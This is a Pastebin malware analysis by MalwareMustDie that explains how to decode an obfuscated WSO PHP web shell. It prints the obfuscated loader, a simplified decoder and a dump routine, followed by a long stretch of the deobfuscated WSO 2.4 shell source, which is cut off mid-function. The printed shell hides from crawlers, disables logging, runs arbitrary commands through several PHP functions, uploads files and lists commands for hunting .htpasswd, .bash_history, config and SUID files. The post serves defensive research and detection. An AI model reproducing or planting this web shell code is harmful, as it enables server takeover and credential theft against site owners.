SHARE
TWEET

#MalwareMustDie! Howto Crack Latest WSO ObfuscationPHP

MalwareMustDie Sep 6th, 2014 (edited) 1,084 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie! WSO latest obfuscation.
  2. # Thank you for the sample to MMD friend!
  3. # Code was analyzed, cracked, explained by:
  4. @unixfreaxjp /malware/temp/001]$ date
  5. Sun Sep  7 02:21:57 JST 2014
  6. #Snapshot PoC:
  7. https://twitter.com/MalwareMustDie/status/508266496099758081
  8. https://twitter.com/unixfreaxjp/status/508312780395405312
  9. VT 22/55: https://www.virustotal.com/en/file/e6d694326c40b5562d1c32ff301ec36111d9c5bbaf46a7b74c862d7a31eb0da9/analysis/1409197668/
  10.  
  11. // ===============================================================
  12. // We received this report of new obfuscated PHP can't be cracked by some
  13. // online tools. It's the WSO and this post will explain how to solve it.
  14. // Below is the evil code:
  15. // ===============================================================
  16.  
  17. <?php if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC4
  18. 6CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260);$TC9A16C47DA8EEE87
  19. =0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T059EC46CFE33
  20. 5260[1])<<8)+ord($T059EC46CFE335260[2]);$TBF14159DC7D007D3=3;$T77605D5F26DD5248=0;$
  21. T4A747C3263CA7A55=16;$T7C7E72B89B83E235="";$T0D47BDF6FD9DDE2E=strlen($T059EC46CFE33
  22. 5260);$T43D5686285035C13=__FILE__;$T43D5686285035C13=file_get_contents($T43D5686285
  23. 035C13);$T6BBC58A3B5B11DC4=0;preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv
  24. "),$T43D5686285035C13,$T6BBC58A3B5B11DC4);for(;$TBF14159DC7D007D3<$T0D47BDF6FD9DDE2
  25. E;){if(count($T6BBC58A3B5B11DC4)) exit;if($T4A747C3263CA7A55==0){$T65CE9F6823D588A7
  26. =(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$T65CE9F6823D588A7+=ord($T059EC
  27. 46CFE335260[$TBF14159DC7D007D3++]);$T4A747C3263CA7A55=16;}if($T65CE9F6823D588A7&0x8
  28. 000){$TC9A16C47DA8EEE87=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<4);$TC9A16C
  29. 47DA8EEE87+=(ord($T059EC46CFE335260[$TBF14159DC7D007D3])>>4);if($TC9A16C47DA8EEE87)
  30. {$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])&0x0F)+3;for($T17
  31. D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++)$T7C7E7
  32. 2B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4]=$T7C7E72B89B83E235[$T77605D5F26D
  33. D5248-$TC9A16C47DA8EEE87+$T17D35BB9DF7A47E4];$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E
  34. ;}else{$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$TA7FB
  35. 8B0A1C0E2E9E+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++])+16;for($T17D35BB9DF7A47
  36. E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248+$T
  37. 17D35BB9DF7A47E4++]=$T059EC46CFE335260[$TBF14159DC7D007D3]);$TBF14159DC7D007D3++;$T
  38. 77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}}else $T7C7E72B89B83E235[$T77605D5F26DD5248++
  39. ]=$T059EC46CFE335260[$TBF14159DC7D007D3++];$T65CE9F6823D588A7<<=1;$T4A747C3263CA7A5
  40. 5--;if($TBF14159DC7D007D3==$T0D47BDF6FD9DDE2E){$T43D5686285035C13=implode("",$T7C7E
  41. 72B89B83E235);$T43D5686285035C13="?".">".$T43D5686285035C13;return $T43D5686285035C
  42. 13;}}}}eval(TC9A16C47DA8EEE87("QAIAPD9waHAgABEkY29sb3IgPSAAACIjZGY1IjsgICRkZWZhdWwA
  43. gHRfYWN0aW9uAbAnRmlsZXNNEAhhbicB+XVzZV9hamF4AhB0cnVAQGUBuWNoYXJzZXQBoCdXaW5kbwEAd3M
  44.  
  45.  // REDACTED FOR SECURITY PURPOSE //
  46.  
  47. xICaxE2VjwSKZoDe0nNEFwQgAXG4iLgXVcyBhdXggfCBncmUnAHAgCRMpLsRwA2AYIiB1bmxpbmso8bsLKQ
  48. pSDsEOjyAnYiywDo1jDoQqUBbRbpkiBGL/HwjxGvAI5TowDrQDMQ6/D8gzJ10Pzw/PrJkG0Q/P36QPxQchI
  49. g/PD8cCE06wHkGuQCBPMyc8qy9yKPNkDeESMCpGqyNSQ6rUE6Ahu1oTMyRhENBhcglCcmF5KLFQInVDsSL/
  50. oXBocF8A4ig4eyksAaEBATzgc2lvbgIFAPQCFBUgXwEkAhIIQVdTT188oFNJT04EEnNhZmVtLLCBWQHSQGl
  51. uaV9nNmAnAXFfAYHDgCAgDFFALiAkcnNlcmlhbGl6LrBhAWEP8P4ndj6gYWzEty8AAhQScQ6AIO+LYTwAIC
  52. kgIAnAJwGwPbRkZWZhdWx0XxJDKSDxUBOFOtaeBgHDJyBJUAL8BMBKkFBPU1RbJwXQFBAk1AMCKxsgCQrSI
  53. AKMJ1NlY0luZm/LgQjgP0EgIQqvCM9DkAjISWQHgCkNUmNhbGxf7CFPQF8MISgnAr8CsQkgSFB0AHA/Pg==
  54. "));?>
  55.  
  56. // ===============================================================
  57. // Unless you have IQ near to 300 so you can read all of the variable
  58. // in obfuscated way, just make it beautiful and "SIMPLIFY" it as:
  59. // ===============================================================
  60.  
  61. <?php
  62. if (!function_exists("var2")) {
  63.     function var2($var1)
  64.     {
  65.         $var1 = base64_decode($var1);
  66.         $var2 = 0;
  67.         $var3 = 0;
  68.         $var4 = 0;
  69.         $var5 = (ord($var1[1]) << 8) + ord($var1[2]);
  70.         $var6 = 3;
  71.         $var7 = 0;
  72.         $var8 = 16;
  73.         $var9 = "";
  74.         $var10 = strlen($var1);
  75.         $var11 = __FILE__;
  76.         $var11 = file_get_contents($var11);
  77.         $var12 = 0;
  78.         preg_match("/(print|sprint|echo)/", $var11, $var12);
  79.         for (; $var6 < $var10;) {
  80.             if (count($var12))  // --- MMD: this is a bullshit..
  81.                 exit;
  82.             if ($var8 == 0) { // --- MMD: This is a delay bullshit..
  83.                 $var5 = (ord($var1[$var6++]) << 8);
  84.                 $var5 += ord($var1[$var6++]);
  85.                 $var8 = 16;
  86.             }
  87.             if ($var5 & 0x8000) { // MMD: glue your eyes in here
  88.                 $var2 = (ord($var1[$var6++]) << 4);
  89.                 $var2 += (ord($var1[$var6]) >> 4);
  90.                 if ($var2) {
  91.                     $var3 = (ord($var1[$var6++]) & 0x0F) + 3;
  92.                     for ($var4 = 0; $var4 < $var3; $var4++)
  93.                         $var9[$var7 + $var4] = $var9[$var7 - $var2 + $var4];
  94.                     $var7 += $var3;
  95.                 } else {
  96.                     $var3 = (ord($var1[$var6++]) << 8);
  97.                     $var3 += ord($var1[$var6++]) + 16;
  98.                     for ($var4 = 0; $var4 < $var3; $var9[$var7 + $var4++] = $var1[$var6]);
  99.                     $var6++;
  100.                     $var7 += $var3;
  101.                 }
  102.             } else
  103.                 $var9[$var7++] = $var1[$var6++];
  104.             $var5 <<= 1;
  105.             $var8--;
  106.             if ($var6 == $var10) {
  107.                 $var11 = implode("", $var9);
  108.                 $var11 = "?" . ">" . $var11;
  109.                 return $var11;
  110.             }
  111.         }
  112.     }
  113. }  // ---MMD: Dont leave that eval↓(unsafe), + never run the var2 manuaally or u lose some  characters..
  114.  
  115. eval(var2("QAIAPD9waHAgABEkY29sb3IgPSAAACIjZGY1IjsgICRkZWZhdWwAgHRfYWN0aW9uAbAnRmls
  116. ZXNNEAhhbicB+XVzZV9hamF4AhB0cnVAQGUBuWNoYXJzZXQBoCdXaW5kbwEAd3MtMTI1MQPxICBpZighZW0
  117. AAHB0eSgkX1NFUlZFUlsnSFQIAFRQX1UA4F9BR0VOVCddKSkgUBB7CfAkBlByQWdlbnRzBNBhcnJhAAB5KC
  118. JHb29nbGUiLCAiU2x1IEBycACRTVNOQm90AKFpYV9hcmMECGhpdmVyAPFZYW5kZXgAoVJhbSwAYmwBUCkKk
  119. AhBcHJlZ19tYXRjaAAAKCcvJyAuIGltcGxvZGUoJwo4fCcsIAeYKQHAJy9pAVELDwsMaGVhCABkZXIoDQIv
  120.  
  121.  // REDACTED FOR SECURITY PURPOSE //
  122.  
  123. BHIkb5/QPSB3c29FeCgiK4EgjAADByAiLgXGm3AuIiAxPi9kZXYvgJ8ysSAyPiYxICaxE2VjwSKZoDe0nNE
  124. FwQgAXG4iLgXVcyBhdXggfCBncmUnAHAgCRMpLsRwA2AYIiB1bmxpbmso8bsLKQpSDsEOjyAnYiywDo1jDo
  125. QqUBbRbpkiBGL/HwjxGvAI5TowDrQDMQ6/D8gzJ10Pzw/PrJkG0Q/P36QPxQchIg/PD8cCE06wHkGuQCBPM
  126. yc8qy9yKPNkDeESMCpGqyNSQ6rUE6Ahu1oTMyRhENBhcglCcmF5KLFQInVDsSL/oXBocF8A4ig4eyksAaEB
  127. ATzgc2lvbgIFAPQCFBUgXwEkAhIIQVdTT188oFNJT04EEnNhZmVtLLCBWQHSQGluaV9nNmAnAXFfAYHDgCA
  128. gDFFALiAkcnNlcmlhbGl6LrBhAWEP8P4ndj6gYWzEty8AAhQScQ6AIO+LYTwAICkgIAnAJwGwPbRkZWZhdW
  129. x0XxJDKSDxUBOFOtaeBgHDJyBJUAL8BMBKkFBPU1RbJwXQFBAk1AMCKxsgCQrSIAKMJ1NlY0luZm/LgQjgP
  130. 0EgIQqvCM9DkAjISWQHgCkNUmNhbGxf7CFPQF8MISgnAr8CsQkgSFB0AHA/Pg=="));
  131. ?>
  132.  
  133. <?php
  134. // ===============================================================
  135. // So now you can see it better =)
  136. // The key to crack is, let the base64_decode do its part to decode
  137. // the blob string and parse it to the function below:
  138. // ===============================================================
  139.  
  140. if ($var5 & 0x8000) {
  141.     $var2 = (ord($var1[$var6++]) << 4);
  142.     $var2 += (ord($var1[$var6]) >> 4);
  143.     if ($var2) {
  144.         $var3 = (ord($var1[$var6++]) & 0x0F) + 3;
  145.         for ($var4 = 0; $var4 < $var3; $var4++)
  146.             $var9[$var7 + $var4] = $var9[$var7 - $var2 + $var4];
  147.         $var7 += $var3;
  148.     } else {
  149.         $var3 = (ord($var1[$var6++]) << 8);
  150.         $var3 += ord($var1[$var6++]) + 16;
  151.         for ($var4 = 0; $var4 < $var3; $var9[$var7 + $var4++] = $var1[$var6]);
  152.         $var6++;
  153.         $var7 += $var3;
  154.     }
  155. } else
  156.     $var9[$var7++] = $var1[$var6++];
  157. $var5 <<= 1;
  158. $var8--;
  159. if ($var6 == $var10) {
  160.     $var11 = implode("", $var9);
  161.     $var11 = "?" . ">" . $var11; }
  162.  
  163. // ===============================================================
  164. // And do your stuff to dump it, to aim the evil code hidden :-))
  165. // Below is a way to safely did that "clean"
  166. // ===============================================================
  167.  
  168. <?php
  169. //  [...]
  170.  
  171. //  (change that eval part into..)
  172. $var99 = var2("QAIAPD9waHA../Pg==");
  173.  
  174. // now let's dump it...
  175. $file = 'dump.txt';
  176. $current = file_get_contents($file);
  177. $current .= $var99;
  178. file_put_contents($file, $current);
  179. ?>
  180.  
  181. // ===============================================================
  182. // Voila! the dump.txt will be filled with the "junk" those moronz hid.
  183. // It's a present from #MalwareMustDie! to good guys & sysadmins in internet,
  184. // here's the "neutralized code" of WSO 2.4 (cant be executed) shared for raising
  185. // awareness, detection ratio & sec research.
  186. // Pls support us by sending samples here: http://www.mediafire.com/dropbox/dropbox.html?nocache=0.47243585277827493&sId=a5a850a1408899fff22c77ea31229b6599c2c6c025042a434133192a363185f0#
  187. // ===============================================================
  188.  
  189. ?><?php
  190. $color            = "#df5";
  191. $default_action   = 'FilesMan';
  192. $default_use_ajax = true;
  193. $default_charset  = 'Windows-1251';
  194. if (!empty($_SERVER['HTTP_USER_AGENT'])) {
  195.     $userAgents = array(
  196.         "Google",
  197.         "Slurp",
  198.         "MSNBot",
  199.         "ia_archiver",
  200.         "Yandex",
  201.         "Rambler"
  202.     );
  203.     if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  204.         header('HTTP/1.0 404 Not Found');
  205.         exit;
  206.     }
  207. }
  208. @session_start();
  209. @ini_set('error_log', NULL);
  210. @ini_set('log_errors', 0);
  211. @ini_set('max_execution_time', 0);
  212. @set_time_limit(0);
  213. @set_magic_quotes_runtime(0);
  214. @define('WSO_VERSION', '2.4');
  215. if (get_magic_quotes_gpc()) {
  216.     function WSOstripslashes($array)
  217.     {
  218.         return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
  219.     }
  220.     $_POST = WSOstripslashes($_POST);
  221. }
  222. if (strtolower(substr(PHP_OS, 0, 3)) == "win")
  223.     $os = 'win';
  224. else
  225.     $os = 'nix';
  226. $safe_mode = @ini_get('safe_mode');
  227. if (!$safe_mode)
  228.     error_reporting(0);
  229. $disable_functions = @ini_get('disable_functions');
  230. $home_cwd          = @getcwd();
  231. if (isset($_POST['c']))
  232.     @chdir($_POST['c']);
  233. $cwd = @getcwd();
  234. if ($os == 'win') {
  235.     $home_cwd = str_replace("\\", "/", $home_cwd);
  236.     $cwd      = str_replace("\\", "/", $cwd);
  237. }
  238. if ($cwd[strlen($cwd) - 1] != '/')
  239.     $cwd .= '/';
  240. if (!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax']))
  241.     $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $GLOBALS['default_use_ajax'];
  242. if ($os == 'win')
  243.     $aliases = array(
  244.         "List Directory" => "dir",
  245.         "Find index.php in current dir" => "dir /s /w /b index.php",
  246.         "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  247.         "Show active connections" => "netstat -an",
  248.         "Show running services" => "net start",
  249.         "User accounts" => "net user",
  250.         "Show computers" => "net view",
  251.         "ARP Table" => "arp -a",
  252.         "IP Configuration" => "ipconfig /all"
  253.     );
  254. else
  255.     $aliases = array(
  256.         "List dir" => "ls -lha",
  257.         "list file attributes on a Linux second extended file system" => "lsattr -va",
  258.         "show opened ports" => "netstat -an | grep -i listen",
  259.         "process status" => "ps aux",
  260.         "Find" => "",
  261.         "find all suid files" => "find / -type f -perm -04000 -ls",
  262.         "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  263.         "find all sgid files" => "find / -type f -perm -02000 -ls",
  264.         "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  265.         "find config.inc.php files" => "find / -type f -name config.inc.php",
  266.         "find config* files" => "find / -type f -name \"config*\"",
  267.         "find config* files in current dir" => "find . -type f -name \"config*\"",
  268.         "find all writable folders and files" => "find / -perm -2 -ls",
  269.         "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  270.         "find all service.pwd files" => "find / -type f -name service.pwd",
  271.         "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  272.         "find all .htpasswd files" => "find / -type f -name .htpasswd",
  273.         "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  274.         "find all .bash_history files" => "find / -type f -name .bash_history",
  275.         "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  276.         "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  277.         "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  278.         "Locate" => "",
  279.         "locate httpd.conf files" => "locate httpd.conf",
  280.         "locate vhosts.conf files" => "locate vhosts.conf",
  281.         "locate proftpd.conf files" => "locate proftpd.conf",
  282.         "locate psybnc.conf files" => "locate psybnc.conf",
  283.         "locate my.conf files" => "locate my.conf",
  284.         "locate admin.php files" => "locate admin.php",
  285.         "locate cfg.php files" => "locate cfg.php",
  286.         "locate conf.php files" => "locate conf.php",
  287.         "locate config.dat files" => "locate config.dat",
  288.         "locate config.php files" => "locate config.php",
  289.         "locate config.inc files" => "locate config.inc",
  290.         "locate config.inc.php" => "locate config.inc.php",
  291.         "locate config.default.php files" => "locate config.default.php",
  292.         "locate config* files " => "locate config",
  293.         "locate .conf files" => "locate '.conf'",
  294.         "locate .pwd files" => "locate '.pwd'",
  295.         "locate .sql files" => "locate '.sql'",
  296.         "locate .htpasswd files" => "locate '.htpasswd'",
  297.         "locate .bash_history files" => "locate '.bash_history'",
  298.         "locate .mysql_history files" => "locate '.mysql_history'",
  299.         "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  300.         "locate backup files" => "locate backup",
  301.         "locate dump files" => "locate dump",
  302.         "locate priv files" => "locate priv"
  303.     );
  304. function wsoHeader()
  305. {
  306.     if (empty($_POST['charset']))
  307.         $_POST['charset'] = $GLOBALS['default_charset'];
  308.     global $color;
  309.     echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title>
  310. <style>
  311. body{background-color:#444;color:#e1e1e1;}
  312. body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
  313. table.info{ color:#fff;background-color:#222; }
  314. span,h1,a{ color: $color !important; }
  315. span{ font-weight: bolder; }
  316. h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
  317. div.content{ padding: 5px;margin-left:5px;background-color:#333; }
  318. a{ text-decoration:none; }
  319. a:hover{ text-decoration:underline; }
  320. .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  321. .bigarea{ width:100%;height:250px; }
  322. input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
  323. form{ margin:0px; }
  324. #toolsTbl{ text-align:center; }
  325. .toolsInp{ width: 300px }
  326. .main th{text-align:left;background-color:#5e5e5e;}
  327. .main tr:hover{background-color:#5e5e5e}
  328. .l1{background-color:#444}
  329. .l2{background-color:#333}
  330. pre{font-family:Courier,Monospace;}
  331. </style>
  332. <script>
  333.    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  334.    var a_ = '" . htmlspecialchars(@$_POST['a']) . "'
  335.    var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';
  336.    var p1_ = '" . ((strpos(@$_POST['p1'], "\n") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';
  337.    var p2_ = '" . ((strpos(@$_POST['p2'], "\n") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';
  338.    var p3_ = '" . ((strpos(@$_POST['p3'], "\n") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';
  339.    var d = document;
  340.         function set(a,c,p1,p2,p3,charset) {
  341.                 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  342.                 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
  343.                 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
  344.                 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
  345.                 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
  346.                 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  347.         }
  348.         function g(a,c,p1,p2,p3,charset) {
  349.                 set(a,c,p1,p2,p3,charset);
  350.                 d.mf.submit();
  351.         }
  352.         function a(a,c,p1,p2,p3,charset) {
  353.                 set(a,c,p1,p2,p3,charset);
  354.                 var params = 'ajax=true';
  355.                 for(i=0;i<d.mf.elements.length;i++)
  356.                         params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  357.                 sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);
  358.         }
  359.         function sr(url, params) {     
  360.                 if (window.XMLHttpRequest)
  361.                         req = new XMLHttpRequest();
  362.                 else if (window.ActiveXObject)
  363.                         req = new ActiveXObject('Microsoft.XMLHTTP');
  364.        if (req) {
  365.            req.onreadystatechange = processReqChange;
  366.            req.open('POST', url, true);
  367.            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
  368.            req.send(params);
  369.        }
  370.         }
  371.         function processReqChange() {
  372.                 if( (req.readyState == 4) )
  373.                         if(req.status == 200) {
  374.                                 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
  375.                                 var arr=reg.exec(req.responseText);
  376.                                 eval(arr[2].substr(0, arr[1]));
  377.                         } else alert('Request error!');
  378.         }
  379. </script>
  380. <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
  381. <form method=post name=mf style='display:none;'>
  382. <input type=hidden name=a>
  383. <input type=hidden name=c>
  384. <input type=hidden name=p1>
  385. <input type=hidden name=p2>
  386. <input type=hidden name=p3>
  387. <input type=hidden name=charset>
  388. </form>";
  389.     $freeSpace  = @diskfreespace($GLOBALS['cwd']);
  390.     $totalSpace = @disk_total_space($GLOBALS['cwd']);
  391.     $totalSpace = $totalSpace ? $totalSpace : 1;
  392.     $release    = @php_uname('r');
  393.     $kernel     = @php_uname('s');
  394.     $explink    = 'http://exploit-db.com/list.php?description=';
  395.     if (strpos('Linux', $kernel) !== false)
  396.         $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
  397.     else
  398.         $explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
  399.     if (!function_exists('posix_getegid')) {
  400.         $user  = @get_current_user();
  401.         $uid   = @getmyuid();
  402.         $gid   = @getmygid();
  403.         $group = "?";
  404.     } else {
  405.         $uid   = @posix_getpwuid(posix_geteuid());
  406.         $gid   = @posix_getgrgid(posix_getegid());
  407.         $user  = $uid['name'];
  408.         $uid   = $uid['uid'];
  409.         $group = $gid['name'];
  410.         $gid   = $gid['gid'];
  411.     }
  412.     $cwd_links = '';
  413.     $path      = explode("/", $GLOBALS['cwd']);
  414.     $n         = count($path);
  415.     for ($i = 0; $i < $n - 1; $i++) {
  416.         $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  417.         for ($j = 0; $j <= $i; $j++)
  418.             $cwd_links .= $path[$j] . '/';
  419.         $cwd_links .= "\")'>" . $path[$i] . "/</a>";
  420.     }
  421.     $charsets     = array(
  422.         'UTF-8',
  423.         'Windows-1251',
  424.         'KOI8-R',
  425.         'KOI8-U',
  426.         'cp866'
  427.     );
  428.     $opt_charsets = '';
  429.     foreach ($charsets as $item)
  430.         $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
  431.     $m = array(
  432.         'Sec. Info' => 'SecInfo',
  433.         'Files' => 'FilesMan',
  434.         'Console' => 'Console',
  435.         'Sql' => 'Sql',
  436.         'Php' => 'Php',
  437.         'Safe mode' => 'SafeMode',
  438.         'String tools' => 'StringTools',
  439.         'Bruteforce' => 'Bruteforce',
  440.         'Network' => 'Network'
  441.     );
  442.     if (!empty($GLOBALS['auth_pass']))
  443.         $m['Logout'] = 'Logout';
  444.     $m['Self remove'] = 'SelfRemove';
  445.     $menu             = '';
  446.     foreach ($m as $k => $v)
  447.         $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
  448.     $drives = "";
  449.     if ($GLOBALS['os'] == 'win') {
  450.         foreach (range('c', 'z') as $drive)
  451.             if (is_dir($drive . ':\\'))
  452.                 $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
  453.     }
  454.     echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=#00bb00><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
  455. }
  456. function wsoFooter()
  457. {
  458.     $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='#25ff00'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
  459.     echo "
  460. </div>
  461. <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
  462.         <tr>
  463.                 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
  464.                 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  465.         </tr><tr>
  466.                 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
  467.                 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  468.         </tr><tr>
  469.                 <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
  470.                 <td><form method='post' ENCTYPE='multipart/form-data'>
  471.                 <input type=hidden name=a value='FilesMAn'>
  472.                 <input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
  473.                 <input type=hidden name=p1 value='uploadFile'>
  474.                 <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
  475.                 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
  476.         </tr></table></div></body></html>";
  477. }
  478. if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) {
  479.     function posix_getpwuid($p)
  480.     {
  481.         return false;
  482.     }
  483. }
  484. if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) {
  485.     function posix_getgrgid($p)
  486.     {
  487.         return false;
  488.     }
  489. }
  490. function wsoEx($in)
  491. {
  492.     $out = '';
  493.     if (function_exists('exec')) {
  494.         @exec($in, $out);
  495.         $out = @join("\n", $out);
  496.     } elseif (function_exists('passthru')) {
  497.         ob_start();
  498.         @passthru($in);
  499.         $out = ob_get_clean();
  500.     } elseif (function_exists('system')) {
  501.         ob_start();
  502.         @system($in);
  503.         $out = ob_get_clean();
  504.     } elseif (function_exists('shell_exec')) {
  505.         $out = shell_exec($in);
  506.     } elseif (is_resource($f = @popen($in, "r"))) {
  507.         $out = "";
  508.         while (!@feof($f))
  509.             $out .= fread($f, 1024);
  510.         pclose($f);
  511.     }
  512.     return $out;
  513. }
  514. function wsoViewSize($s)
  515. {
  516.     if ($s >= 1073741824)
  517.         return sprintf('%1.2f', $s / 1073741824) . ' GB';
  518.     elseif ($s >= 1048576)
  519.         return sprintf('%1.2f', $s / 1048576) . ' MB';
  520.     elseif ($s >= 1024)
  521.         return sprintf('%1.2f', $s / 1024) . ' KB';
  522.     else
  523.         return $s . ' B';
  524. }
  525. function wsoPerms($p)
  526. {
  527.     if (($p & 0xC000) == 0xC000)
  528.         $i = 's';
  529.     elseif (($p & 0xA000) == 0xA000)
  530.         $i = 'l';
  531.     elseif (($p & 0x8000) == 0x8000)
  532.         $i = '-';
  533.     elseif (($p & 0x6000) == 0x6000)
  534.         $i = 'b';
  535.     elseif (($p & 0x4000) == 0x4000)
  536.         $i = 'd';
  537.     elseif (($p & 0x2000) == 0x2000)
  538.         $i = 'c';
  539.     elseif (($p & 0x1000) == 0x1000)
  540.         $i = 'p';
  541.     else
  542.         $i = 'u';
  543.     $i .= (($p & 0x0100) ? 'r' : '-');
  544.     $i .= (($p & 0x0080) ? 'w' : '-');
  545.     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
  546.     $i .= (($p & 0x0020) ? 'r' : '-');
  547.     $i .= (($p & 0x0010) ? 'w' : '-');
